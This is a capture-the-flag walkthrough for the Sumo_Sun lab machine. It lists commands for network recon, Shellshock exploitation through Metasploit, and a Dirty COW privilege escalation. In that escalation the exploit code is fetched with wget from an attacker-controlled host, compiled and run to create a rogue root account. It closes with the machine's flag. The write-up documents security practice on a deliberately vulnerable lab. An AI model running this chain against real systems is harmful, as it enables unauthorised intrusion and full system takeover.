Good afternoon, today we will be walkthrough the Sumo_Sun machine from the SunCSR Team.
Enumeration
First, scan the internal network and find the ip address of our target.

arp-scan -l
When scanning ports, we find the apache2 server running on port 80, let's see what it contains.

nmap -A -T4 192.168.2.102 > nmap_scan.txt && cat nmap_scan.txt
And so before us is a regular web page. I will use nikto to find something interesting.

Shell
Nikto detected an uncommon header and apparently this is a CVE hint that we need to use, we also see that /cgi-bin/test has a shellshock vulnerability.

nikto -h http://192.168.2.102
To exploit this vulnerability, I will use metasploit


set RHOSTS 192.168.2.102
set TARGETURI /cgi-bin/test
run
shell
python -c 'import pty; pty.spawn("/bin/sh")'
PE
At this stage we successfully got access to the machine as www-data, now we need to get root
First, I will check the system for the dirty cow vulnerability using the dirtycowscan.sh script. As the script showed, the system is vulnerable

Using python HTTP Server and wget I deliver exploit code to our goal. using gcc, I compile the exploit code and get the executable

wget https://www.exploit-db.com/raw/40839
mv 40839 dirty.c
python -m SimpleHTTPServer 91
wget http://192.168.2.107:91/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
Using the exploit, I created a new root user with the password n3ws3cr3tpass. now i connect to it using ssh

./dirty n3ws3cr3tpass
firefart:n3ws3cr3tpass
And i got root flag

{Sum0-SunCSR-2020_r001}